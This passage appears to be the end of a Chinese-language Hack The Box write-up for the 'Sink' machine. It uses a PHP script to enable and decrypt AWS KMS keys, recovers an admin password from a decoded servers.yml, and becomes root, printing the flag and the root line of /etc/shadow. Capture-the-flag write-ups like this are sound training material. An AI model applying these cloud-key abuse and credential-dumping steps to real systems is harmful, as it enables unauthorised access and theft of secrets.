$cipherb64 = "mXMs+8ZLEp9krGLLJT2YHLgHQP/uRJYSfX+YTqar7wabvOQ8PSuPwUFAmEJh86q3kaURmnRxr/smZvkU6Pp0KPV7ye2sP10hvPJDF2mkNcIEVif3RaMU08jZi7U/ghZyoXseM6EEcu9c1gYpDqZ74CMEh7AoasksLswCJJZYI0TfcvTlXx84XBfCWsK7cTyDb4SughAq9MY89Q6lt7gnw6IwG/tSHi9a1MY8eblCwCMNwRrFQ44x8p3hS2FLxZe2iKUrpiyUDmdThpFJPcM3uxiXU+cuyZJgxzQ2Wl0Gqaj0RpVD2w2wJGrQBnCnouahOD1SXT3DwrUMWXyeNMc52lWo3aB+mq/uhLxcTeGSImHJcfUYYQqXoIrOHcS7O1WFoaMvMtIAl+uRslGVSEwiU6sVe9nMCuyvrsbsQ0N46jjro5h1nFmTmZ0C1Xr97Go/pHmJxgG1lxnOepsglLrPMXc5F6lFH1aKxlzFVAxGKWNAzTlzGC+HnBXjugLpP8Shpb24HPdnt/fF/dda8qyaMcYZCOmLODums2+ROtrPJ4CTuaiSbOWJuheQ6U/v5AbeQSF93RF28iyiA905SCNRi3ejGDH65OWv6aw1VnTf8TaREPH5ZNLazTW5Jo8kvLqJaEtZISRNUEmsJHr79U1VjpovPzePTKeDTR0qosW/GJ8=";

for ($i=0; $i<count($keys); $i++) {

try {
    $result = $KmsClient->enableKey([
        'KeyId' => $keys[$i],
    ]);

    $result = $KmsClient->decrypt([
        'CiphertextBlob' => base64_decode($cipherb64),
        'KeyId' => $keys[$i],
        'EncryptionAlgorithm' => 'RSAES_OAEP_SHA_256',
    ]);
    echo base64_encode($result["Plaintext"]);
}
catch (AwsException $e) {
}
}

运行php脚本

┌──(root💀kali)-[~/hackthebox/machine/sink]
└─# php decrypt.php 
H4sIAAAAAAAAAytOLSpLLSrWq8zNYaAVMAACMxMTMA0E6LSBkaExg6GxubmJqbmxqZkxg4GhkYGhAYOCAc1chARKi0sSixQUGIry80vwqSMkP0RBMTj+rbgUFHIyi0tS8xJTUoqsFJSUgAIF+UUlVgoWBkBmRn5xSTFIkYKCrkJyalFJsV5xZl62XkZJElSwLLE0pwQhmJKaBhIoLYaYnZeYm2qlkJiSm5kHMjixuNhKIb40tSqlNFDRNdLU0SMt1YhroINiRIJiaP4vzkynmR2E878hLP+bGALZBoaG5qamo/mfHsCgsY3JUVnT6ra3Ea8jq+qJhVuVUw32RXC+5E7RteNPdm7ff712xavQy6bsqbYZO3alZbyJ22V5nP/XtANG+iunh08t2GdR9vUKk2ON1IfdsSs864IuWBr95xPdoDtL9cA+janZtRmJyt8crn9a5V7e9aXp1BcO7bfCFyZ0v1w6a8vLAw7OG9crNK/RWukXUDTQATEKRsEoGAWjYBSMglEwCkbBKBgFo2AUjIJRMApGwSgYBaNgFIyCUTAKRsEoGAWjYBSMglEwRAEATgL7TAAoAAA=

servers.yml

解密base64密文得到明文，gzip解压后是servers.yml，里面有密码：

use online cyberchef

• cyberchef

cyberchef解码的url：

https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true)Gunzip()&input=SDRzSUFBQUFBQUFBQXl0T0xTcExMU3JXcTh6TllhQVZNQUFDTXhNVE1BMEU2TFNCa2FFeGc2R3h1Ym1KcWJteHFaa3hnNEdoa1lHaEFZT0NBYzFjaEFSS2kwc1NpeFFVR0lyeTgwdndxU01rUDBSQk1UaityYmdVRkhJeWkwdFM4eEpUVW9xc0ZKU1VnQUlGK1VVbFZnb1dCa0JtUm41eFNURklrWUtDcmtKeWFsRkpzVjV4Wmw2MlhrWkpFbFN3TExFMHB3UWhtSkthQmhJb0xZYVluWmVZbTJxbGtKaVNtNWtITWppeHVOaEtJYjQwdFNxbE5GRFJOZExVMFNNdDFZaHJvSU5pUklKaWFQNHZ6a3lubVIyRTg3OGhMUCtiR0FMWkJvYUc1cWFtby9tZkhzQ2dzWTNKVVZuVDZyYTNFYThqcStxSmhWdVZVdzMyUlhDKzVFN1J0ZU5QZG03ZmY3MTJ4YXZReTZic3FiWVpPM2FsWmJ5SjIyVjVuUC9YdEFORytpdW5oMDh0MkdkUjl2VUtrMk9OMUlmZHNTczg2NEl1V0JyOTV4UGRvRHRMOWNBK2phblp0Um1KeXQ4Y3JuOWE1VjdlOWFYcDFCY083YmZDRnlaMHYxdzZhOHZMQXc3T0c5Y3JOSy9SV3VrWFVEVFFBVEVLUnNFb0dBV2pZQlNNZ2xFd0NrYkJLQmdGbzJBVWpJSlJNQXBHd1NnWUJhTmdGSXlDVVRBS1JzRW9HQVdqWUJTTWdsRXdSQUVBVGdMN1RBQW9BQUE9

cyberchef解码结果:

servers.yml.........................................................................................0000644.0000000.0000000.00000000213.13774573563.012010. 0....................................................................................................ustar  .root............................root...................................................................................................................................................................................................................server:
  listenaddr: ""
  port: 80
  hosts:
    - certs.sink.htb
    - vault.sink.htb
defaultuser:
  name: admin
  pass: _uezduQ!EY5AHfe2
.....................................................................................................................................................................................................................................................................................................................................................................................servers.sig.........................................................................................0000644.0000000.0000000.00000000211.13774574111.011755. 0....................................................................................................ustar  .root............................root...................................................................................................................................................................................................................0...A#):ÛK2
A.%È¡µ#e0¾X	é.d->.cC.¿×}¨êUÓ5.e=h¸ºfhì^º9Ç.ú.À2/©.W.p¾8võÔ.A|.ð»]¨I~RÐ92ÿ..°-.%À¾(.k}ha#ö@×òªGw.ô.Êô.+í.Ð..é¥.´éÀ@C±¯ .¬*©NPr............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

get root

name: admin
pass: _uezduQ!EY5AHfe2

这个密码就是root密码，直接ssh登录，得到root.txt:

david@sink:~$ su root
Password: 
root@sink:/home/david# id
uid=0(root) gid=0(root) groups=0(root)
root@sink:/home/david# whoami
root
root@sink:/home/david# cd
root@sink:~# ls
automation  desync  docker-compose.yml  root.txt  snap
root@sink:~# cat root.txt
5e3a99117cded05e500c24e3160cdf27
root@sink:~# cat /etc/shadow | grep root
root:$6$PYtd2G7mK9kPLNkn$9kn.hmGZhQ1Am5Pyi2.o.Lt6k7ned9iHRyXIu4yg28NkHW0UTf9IaZ7NA7P5spZJK9CDIYYnW9P1najKD8ETA.:18598:0:99999:7:::

• 

Summary of knowledge

• 请求走私触发管理员的request得到管理员的cookie
• 撞密码
• aws key及secret利用操作获取账号密码
• aws listkeys操作解密.enc文件
• cyberchef利用base64 + Gunzip解码获得账号密码

Contact me

• QQ: 1185151867
• twitter: https://twitter.com/fdlucifer11
• github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security reseacher, hacker, bug hunter and more…